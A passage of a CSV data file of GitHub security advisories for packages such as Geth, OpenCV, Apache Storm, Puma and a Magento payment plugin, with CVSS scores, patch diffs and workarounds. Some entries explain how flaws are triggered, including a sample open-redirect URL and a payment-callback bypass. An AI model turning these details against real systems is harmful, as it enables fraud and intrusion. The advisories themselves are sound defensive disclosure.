'opencv-contrib-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '4.1.0.25'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-5063'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/16951'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv-python/releases/tag/25'}, {'type': 'WEB', 'url': 'https://talosintelligence.com/vulnerability_reports/TALOS-2019-0852'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T17:40:07Z', 'nvd_published_at': '2020-01-03T17:15:00Z'}"
+1.4.0,GHSA-qf6q-qfwp-vp44,2021-10-08T22:34:05Z,2021-10-12T16:30:58Z,,['CVE-2020-8818'],Origin Validation Error in Magento 2,"An issue was discovered in the CardGate Payments plugin through 2.0.30 for Magento 2. Lack of origin authentication in the IPN callback processing function in Controller/Payment/Callback.php allows an attacker to remotely replace critical plugin settings (merchant ID, secret key, etc.) and therefore bypass the payment process (e.g., spoof an order status by manually sending an IPN callback request with a valid signature but without real payment) and/or receive all of the subsequent payments.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'cardgate/magento2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.33'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8818'}, {'type': 'WEB', 'url': 'https://github.com/cardgate/magento2/issues/54'}, {'type': 'PACKAGE', 'url': 'https://github.com/cardgate/magento2'}, {'type': 'WEB', 'url': 'https://github.com/cardgate/magento2/blob/715979e54e1a335d78a8c5586f9e9987c3bf94fd/Controller/Payment/Callback.php#L88-L107'}, {'type': 'WEB', 'url': 'https://github.com/cardgate/magento2/releases/tag/v2.0.33'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/156505/Magento-WooCommerce-CardGate-Payment-Gateway-2.0.30-Bypass.html'}]","{'cwe_ids': ['CWE-346'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T22:34:05Z', 'nvd_published_at': '2020-02-25T02:15:00Z'}"
+1.4.0,GHSA-59hh-656j-3p7v,2023-08-29T18:55:39Z,2021-10-25T19:42:57Z,,['CVE-2021-41173'],Geth Node Vulnerable to DoS via maliciously crafted p2p message ,"### Impact
+
+A vulnerable node is susceptible to crash when processing a maliciously crafted message from a peer, via the `snap/1` protocol. The crash can be triggered by sending a malicious `snap/1` `GetTrieNodes` package.
+
+### Details
+
+On September 21, 2021, geth-team member Gary Rong (@rjl493456442) found a way to crash the snap request handler .
+By using this vulnerability, a peer connected on the `snap/1` protocol could cause a vulnerable node to crash with a `panic`.
+
+In the `trie.TryGetNode` implementation, if the requested path is reached, the associated node will be returned. However the nilness is
+not checked there.
+
+```golang
+func (t *Trie) tryGetNode(origNode node, path []byte, pos int) (item []byte, newnode node, resolved int, err error) {
+ // If we reached the requested path, return the current node
+ if pos >= len(path) {
+ // Although we most probably have the original node expanded, encoding
+ // that into consensus form can be nasty (needs to cascade down) and
+ // time consuming. Instead, just pull the hash up from disk directly.
+ var hash hashNode
+ if node, ok := origNode.(hashNode); ok {
+ hash = node
+ } else {
+ hash, _ = origNode.cache()
+ }
+```
+More specifically the `origNode` can be nil(e.g. the child of fullnode) and system can panic at line `hash, _ = origNode.cache()`.
+
+When investigating this, @holiman tried to find it via fuzzing, which uncovered a second crasher, also related to the snap `GetTrieNodes` package. If the caller requests a storage trie:
+```golang
+ // Storage slots requested, open the storage trie and retrieve from there
+ account, err := snap.Account(common.BytesToHash(pathset[0]))
+ loads++ // always account database reads, even for failures
+ if account == nil {
+ break
+ }
+ stTrie, err := trie.NewSecure(common.BytesToHash(account.Root), triedb)
+```
+The code assumes that `snap.Account` returns _either_ a non-nil response unless `error` is also provided. This is however not the case, since `snap.Account` can return `nil, nil`.
+
+### Patches
+
+```diff
+--- a/eth/protocols/snap/handler.go
++++ b/eth/protocols/snap/handler.go
+@@ -469,7 +469,7 @@ func handleMessage(backend Backend, peer *Peer) error {
+ // Storage slots requested, open the storage trie and retrieve from there
+ account, err := snap.Account(common.BytesToHash(pathset[0]))
+ loads++ // always account database reads, even for failures
+- if err != nil {
++ if err != nil || account == nil {
+ break
+ }
+ stTrie, err := trie.NewSecure(common.BytesToHash(account.Root), triedb)
+diff --git a/trie/trie.go b/trie/trie.go
+index 7ea7efa835..d0f0d4e2bc 100644
+--- a/trie/trie.go
++++ b/trie/trie.go
+@@ -174,6 +174,10 @@ func (t *Trie) TryGetNode(path []byte) ([]byte, int, error) {
+ }
+
+ func (t *Trie) tryGetNode(origNode node, path []byte, pos int) (item []byte, newnode node, resolved int, err error) {
++ // If non-existent path requested, abort
++ if origNode == nil {
++ return nil, nil, 0, nil
++ }
+ // If we reached the requested path, return the current node
+ if pos >= len(path) {
+ // Although we most probably have the original node expanded, encoding
+@@ -193,10 +197,6 @@ func (t *Trie) tryGetNode(origNode node, path []byte, pos int) (item []byte, new
+ }
+ // Path still needs to be traversed, descend into children
+ switch n := (origNode).(type) {
+- case nil:
+- // Non-existent path requested, abort
+- return nil, nil, 0, nil
+-
+ case valueNode:
+ // Path prematurely ended, abort
+ return nil, nil, 0, nil
+
+```
+The fixes were merged into [#23657](https://github.com/ethereum/go-ethereum/pull/23657), with commit [f1fd963](https://github.com/ethereum/go-ethereum/pull/23657/commits/f1fd963a5a965e643e52fcf805a2a02a323c32b8), and released as part of Geth [v1.10.9](https://github.com/ethereum/go-ethereum/tree/v1.10.9) on Sept 29, 2021.
+
+### Workarounds
+
+Apply the patch above or upgrade to a version which is not vulnerable.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [go-ethereum](https://github.com/ethereum/go-ethereum/)
+* Email us at [security@ethereum.org](mailto:security@ethereum.org)
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/ethereum/go-ethereum'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.10.9'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/security/advisories/GHSA-59hh-656j-3p7v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41173'}, {'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/pull/23657/commits/f1fd963a5a965e643e52fcf805a2a02a323c32b8'}, {'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/pull/23801'}, {'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/commit/e40b37718326b8b4873b3b00a0db2e6c6d9ea738'}, {'type': 'PACKAGE', 'url': 'https://github.com/ethereum/go-ethereum'}, {'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/releases/tag/v1.10.9'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2022-0256'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-25T18:23:10Z', 'nvd_published_at': '2021-10-26T14:15:00Z'}"
+1.4.0,GHSA-gw97-f6h8-gm94,2021-10-20T17:07:20Z,2021-10-13T18:55:04Z,,['CVE-2021-42009'],Email relay in Apache Traffic Control,"An authenticated Apache Traffic Control Traffic Ops user with Portal-level privileges can send a request with a specially-crafted email subject to the /deliveryservices/request Traffic Ops endpoint to send an email, from the Traffic Ops server, with an arbitrary body to an arbitrary email address. Apache Traffic Control 5.1.x users should upgrade to 5.1.3 or 6.0.0. 4.1.x users should upgrade to 5.1.3.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/apache/trafficcontrol'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.1.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-42009'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/trafficcontrol'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r78d471d8a4fd268a4c5ae6c47327c09d9d4b4467c31da2c97422febb@%3Cdev.trafficcontrol.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7dfa9a89b39d06caeeeb7b5cdc41b3493a9b86cc6cfa059d3f349d87@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re384fd0f44c6d230f31376153c6e8b59e4a669f927c1533d06d702af%40%3Cdev.trafficcontrol.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf0481b9e38ece1ece458d3ce7b2d671df819e3555597f31fc34f084e%40%3Ccommits.trafficcontrol.apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/10/12/1'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-13T17:43:05Z', 'nvd_published_at': '2021-10-12T08:15:00Z'}"
+1.4.0,GHSA-pm77-c4q7-3fwj,2021-10-08T22:58:55Z,2021-10-12T16:31:12Z,,['CVE-2019-20455'],Improper Certificate Validation in Heartland & Global Payments PHP SDK,Gateways/Gateway.php in Heartland & Global Payments PHP SDK before 2.0.0 does not enforce SSL certificate validations.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'globalpayments/php-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-20455'}, {'type': 'WEB', 'url': 'https://github.com/globalpayments/php-sdk/pull/8'}, {'type': 'WEB', 'url': 'https://github.com/globalpayments/php-sdk/pull/8/commits/c86e18f28c5eba0d6ede7d557756d978ea83d3c9'}, {'type': 'PACKAGE', 'url': 'https://github.com/globalpayments/php-sdk'}, {'type': 'WEB', 'url': 'https://github.com/globalpayments/php-sdk/compare/1.3.3...2.0.0'}, {'type': 'WEB', 'url': 'https://github.com/globalpayments/php-sdk/releases/tag/2.0.0'}, {'type': 'WEB', 'url': 'https://winterdragon.ca/global-payments-vulnerability/'}]","{'cwe_ids': ['CWE-295'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T22:58:55Z', 'nvd_published_at': '2020-02-14T16:15:00Z'}"
+1.4.0,GHSA-362v-wg5p-64w2,2021-10-20T17:28:19Z,2021-10-12T18:41:16Z,,['CVE-2021-42135'],Incorrect Privilege Assignment in HashiCorp Vault,"HashiCorp Vault and Vault Enterprise 1.8.x through 1.8.4 may have an unexpected interaction between glob-related policies and the Google Cloud secrets engine. Users may, in some situations, have more privileges than intended, e.g., a user with read permission for the /gcp/roleset/* path may be able to issue Google Cloud service account credentials.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.8.0'}, {'last_affected': '1.8.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-42135'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2021-28-vaults-google-cloud-secrets-engine-policies-with-globs-may-provide-additional-privileges-in-vault-1-8-0-onwards/'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/vault'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/vault/blob/main/CHANGELOG.md#180'}]","{'cwe_ids': ['CWE-266', 'CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-12T16:53:55Z', 'nvd_published_at': '2021-10-11T03:15:00Z'}"
+1.4.0,GHSA-ggmv-6q9p-9gm6,2021-10-19T14:51:11Z,2021-10-12T17:51:04Z,,['CVE-2021-42134'],Cross-site Scripting in django-unicorn,The Unicorn framework before 0.36.1 for Django allows XSS via a component. NOTE: this issue exists because of an incomplete fix for CVE-2021-42053.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'django-unicorn'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.36.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-42134'}, {'type': 'WEB', 'url': 'https://github.com/adamghill/django-unicorn/commit/3a832a9e3f6455ddd3b87f646247269918ad10c6'}, {'type': 'PACKAGE', 'url': 'https://github.com/adamghill/django-unicorn'}, {'type': 'WEB', 'url': 'https://github.com/adamghill/django-unicorn/compare/0.36.0...0.36.1'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-12T16:56:03Z', 'nvd_published_at': '2021-10-11T01:15:00Z'}"
+1.4.0,GHSA-h58v-g3q6-q9fx,2021-10-21T21:33:34Z,2021-10-22T16:20:53Z,,['CVE-2021-41169'],Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) in sulu/sulu,"### Impact
+
+_What kind of vulnerability is it? Who is impacted?_
+
+It is an issue when input HTML into the Tag name. The HTML is execute when the tag name is listed in the auto complete form.
+Only admin users are affected and only admin users can create tags.
+
+### Patches
+
+_Has the problem been patched? What versions should users upgrade to?_
+
+The problem is patched with Version 1.6.42.
+
+### Workarounds
+
+_Is there a way for users to fix or remediate the vulnerability without upgrading?_
+
+Create a custom request listener to avoid that this kind of tags are created.
+
+### References
+
+_Are there any links users can visit to find out more?_
+
+Currently not.
+
+### For more information
+
+If you have any questions or comments about this advisory:
+
+* Open an issue in [sulu/sulu repository](https://github.com/sulu/sulu/issues)
+* Email us at [security@sulu.io](mailto:security@sulu.io)
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'sulu/sulu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.43'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/sulu/sulu/security/advisories/GHSA-h58v-g3q6-q9fx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41169'}, {'type': 'WEB', 'url': 'https://github.com/sulu/sulu/commit/20007ac70a3af3c9e53a6acb0ef8794b65642445'}, {'type': 'PACKAGE', 'url': 'https://github.com/sulu/sulu'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-21T21:33:34Z', 'nvd_published_at': '2021-10-21T21:15:00Z'}"
+1.4.0,GHSA-p6vg-p826-qp3v,2021-10-21T15:01:19Z,2021-10-05T20:24:49Z,,['CVE-2021-22963'],URL Redirection to Untrusted Site ('Open Redirect') in fastify-static,"### Impact
+
+A redirect vulnerability in the `fastify-static` module allows remote attackers to redirect Mozilla Firefox users to arbitrary websites via a double slash `//` followed by a domain: `http://localhost:3000//google.com/%2e%2e`.
+
+The issue shows up on all the `fastify-static` applications that set `redirect: true` option. By default, it is `false`.
+
+### Patches
+The issue has been patched in `fastify-static@4.2.4`
+
+### Workarounds
+If updating is not an option, you can sanitize the input URLs using the [`rewriteUrl`](https://www.fastify.io/docs/latest/Server/#rewriteurl) server option.
+
+### References
+
++ Bug founder: drstrnegth
++ [hackerone Report](https://hackerone.com/reports/1354255)
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [fastify-static](https://github.com/fastify/fastify-static)
+* Contact the [security team](https://github.com/fastify/fastify/blob/main/SECURITY.md#the-fastify-security-team)
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'fastify-static'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.2.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/fastify/fastify-static/security/advisories/GHSA-p6vg-p826-qp3v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22963'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/1354255'}, {'type': 'PACKAGE', 'url': 'https://github.com/fastify/fastify-static'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-05T18:55:33Z', 'nvd_published_at': '2021-10-14T15:15:00Z'}"
+1.4.0,GHSA-4p3x-8qw9-24w9,2021-10-26T17:56:23Z,2021-10-27T18:53:18Z,,['CVE-2021-41188'],Authenticated Stored XSS in shopware/shopware,"### Impact
+Authenticated Stored XSS in Administration
+
+### Patches
+Use the Security Plugin:
+https://store.shopware.com/en/swag575294366635f/shopware-security-plugin.html
+
+### Workarounds
+If you cannot use the security plugin, add the following config to your `.htaccess` file
+
+```
+
+
+ Header set Content-Security-Policy ""script-src 'none'""
+
+
+```
+
+If you are using nginx as server config, you can add the following to your configuration:
+```
+server {
+ # ...
+
+ location ~* ^.+\.svg$ {
+ add_header Content-Security-Policy ""script-src 'none'"";
+ }
+}
+```
+
+### References
+https://docs.shopware.com/en/shopware-5-en/sicherheitsupdates/security-update-10-2021
+
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/shopware'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.7.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/shopware/security/advisories/GHSA-4p3x-8qw9-24w9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41188'}, {'type': 'WEB', 'url': 'https://github.com/shopware/shopware/commit/37213e91d525c95df262712cba80d1497e395a58'}, {'type': 'WEB', 'url': 'https://docs.shopware.com/en/shopware-5-en/sicherheitsupdates/security-update-10-2021'}, {'type': 'PACKAGE', 'url': 'https://github.com/shopware/shopware'}, {'type': 'WEB', 'url': 'https://github.com/shopware/shopware/releases/tag/v5.7.6'}, {'type': 'WEB', 'url': 'https://store.shopware.com/en/swag575294366635f/shopware-security-plugin.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-26T17:56:23Z', 'nvd_published_at': '2021-10-26T15:15:00Z'}"
+1.4.0,GHSA-6768-mcjc-8223,2022-10-19T15:36:14Z,2021-10-27T18:51:22Z,,['CVE-2021-38294'],Command injection leading to Remote Code Execution in Apache Storm,A Command Injection vulnerability exists in the getTopologyHistory service of the Apache Storm 2.x prior to 2.2.1 and Apache Storm 1.x prior to 1.2.4. A specially crafted thrift request to the Nimbus server allows Remote Code Execution (RCE) prior to authentication.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.storm:storm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.storm:storm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.1.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.storm:storm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.2.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-38294'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/storm'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5fe881f6ca883908b7a0f005d35115af49f43beea7a8b0915e377859%40%3Cuser.storm.apache.org%3E'}, {'type': 'WEB', 'url': 'https://seclists.org/oss-sec/2021/q4/44'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/165019/Apache-Storm-Nimbus-2.2.0-Command-Execution.html'}]","{'cwe_ids': ['CWE-74', 'CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-26T17:52:52Z', 'nvd_published_at': '2021-10-25T13:15:00Z'}"
+1.4.0,GHSA-48w2-rm65-62xx,2022-08-16T19:48:45Z,2021-10-12T17:53:00Z,,['CVE-2021-41136'],Puma with proxy which forwards LF characters as line endings could allow HTTP request smuggling,"### Impact
+
+Prior to `puma` version 5.5.0, using `puma` with a proxy which forwards LF characters as line endings could allow HTTP request smuggling. A client could smuggle a request through a proxy, causing the proxy to send a response back to another unknown client.
+
+This behavior (forwarding LF characters as line endings) is very uncommon amongst proxy servers, so we have graded the impact here as ""low"". Puma is only aware of a single proxy server which has this behavior.
+
+If the proxy uses persistent connections and the client adds another request in via HTTP pipelining, the proxy may mistake it as the first request's body. Puma, however, would see it as two requests, and when processing the second request, send back a response that the proxy does not expect. If the proxy has reused the persistent connection to Puma to send another request for a different client, the second response from the first client will be sent to the second client.
+
+### Patches
+
+This vulnerability was patched in Puma 5.5.1 and 4.3.9.
+
+### Workarounds
+
+This vulnerability only affects Puma installations without any proxy in front.
+
+Use a proxy which does not forward LF characters as line endings.
+
+Proxies which do not forward LF characters as line endings:
+
+* Nginx
+* Apache (>2.4.25)
+* Haproxy
+* Caddy
+* Traefik
+
+### Possible Breakage
+
+If you are [dealing with legacy clients that want to send `LF` as a line ending](https://stackoverflow.com/questions/43574428/have-apache-accept-lf-vs-crlf-in-request-headers) in an HTTP header, this will cause those clients to receive a `400` error.
+
+### References
+
+* [HTTP Request Smuggling](https://portswigger.net/web-security/request-smuggling)
+
+### For more information
+
+If you have any questions or comments about this advisory:
+
+* Open an issue in [Puma](https://github.com/puma/puma)
+* See our [security policy](https://github.com/puma/puma/security/policy)
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'puma'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.5.1'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'puma'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.3.9'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/puma/puma/security/advisories/GHSA-48w2-rm65-62xx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41136'}, {'type': 'WEB', 'url': 'https://github.com/puma/puma/commit/acdc3ae571dfae0e045cf09a295280127db65c7f'}, {'type': 'PACKAGE', 'url': 'https://github.com/puma/puma'}, {'type': 'WEB', 'url': 'https://github.com/puma/puma/releases/tag/v4.3.9'}, {'type': 'WEB', 'url': 'https://github.com/puma/puma/releases/tag/v5.5.1'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/puma/CVE-2021-41136.yml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2022/08/msg00015.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202208-28'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2022/dsa-5146'}]","{'cwe_ids': ['CWE-444'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-10-12T17:06:36Z', 'nvd_published_at': '2021-10-12T16:15:00Z'}"
+1.4.0,GHSA-jcxv-2j3h-mg59,2021-11-18T15:31:01Z,2021-10-12T22:03:09Z,,['CVE-2017-17760'],Improper Restriction of Operations within the Bounds of a Memory Buffer in OpenCV,"OpenCV 3.3.1 (corresponding with opencv-python and opencv-contrib-python 3.3.1.11) has a Buffer Overflow in the cv::PxMDecoder::readData function in grfmt_pxm.cpp, because an incorrect size value is used.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.0.12'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.1.11'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.0.12'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.1.11'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-17760'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/10351'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/10369/commits/7bbe1a53cfc097b82b1589f7915a2120de39274c'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/01/msg00008.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/07/msg00030.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/102974'}]","{'cwe_ids': ['CWE-119'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T20:20:01Z', 'nvd_published_at': '2017-12-29T18:29:00Z'}"
+1.4.0,GHSA-25fx-mxc2-76g7,2022-08-15T20:11:12Z,2021-10-06T17:49:11Z,,['CVE-2021-41120'],"Sylius PayPal Plugin allows unauthorized access to Credit card form, exposing payer name and not requiring 3DS","### Impact
+URL to the payment page done after checkout was created with autoincremented payment id (`/pay-with-paypal/{id}`) and therefore it was easy to access for anyone, not even the order's customer. The problem was, the Credit card form has prefilled ""credit card holder"" field with the Customer's first and last name.
+Additionally, the mentioned form did not require a 3D Secure authentication, as well as did not checked the result of the 3D Secure authentication.
+
+### Patches
+The problem has been patched in Sylius/PayPalPlugin **1.2.4** and **1.3.1**
+
+### Workarounds
+One can override a `sylius_paypal_plugin_pay_with_paypal_form` route and change its URL parameters to (for example) `{orderToken}/{paymentId}`, then override the `Sylius\PayPalPlugin\Controller\PayWithPayPalFormAction` service, to operate on the payment taken from the repository by these 2 values. It would also require usage of custom repository method.
+Additionally, one could override the `@SyliusPayPalPlugin/payWithPaypal.html.twig` template, to add `contingencies: ['SCA_ALWAYS']` line in `hostedFields.submit(...)` function call (line 421). It would then have to be handled in the function callback.
+
+### For more information
+If you have any questions or comments about this advisory:
+- Open an issue in Sylius/PayPalPlugin issues
+- Email us at security at sylius dot com
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'sylius/paypal-plugin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.2.4'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'sylius/paypal-plugin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.3.0'}, {'fixed': '1.3.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Sylius/PayPalPlugin/security/advisories/GHSA-25fx-mxc2-76g7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41120'}, {'type': 'WEB', 'url': 'https://github.com/Sylius/PayPalPlugin/commit/2adc46be2764ccee22b4247139b8056fb8d1afff'}, {'type': 'WEB', 'url': 'https://github.com/Sylius/PayPalPlugin/commit/814923c2e9d97fe6279dcee866c34ced3d2fb7a7'}, {'type': 'PACKAGE', 'url': 'https://github.com/Sylius/PayPalPlugin'}]","{'cwe_ids': ['CWE-200', 'CWE-639'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-05T21:12:27Z', 'nvd_published_at': '2021-10-05T21:15:00Z'}"
+1.4.0,GHSA-jwqp-28gf-p498,2021-10-06T17:32:00Z,2021-10-06T17:46:22Z,,['CVE-2021-41125'],HTTP authentication credentials potentially leaked to target websites ,"### Impact
+
+If you use [`HttpAuthMiddleware`](http://doc.scrapy.org/en/latest/topics/downloader-middleware.html#module-scrapy.downloadermiddlewares.httpauth) (i.e. the `http_user` and `http_pass` spider attributes) for HTTP authentication, all requests will expose your credentials to the request target.
+
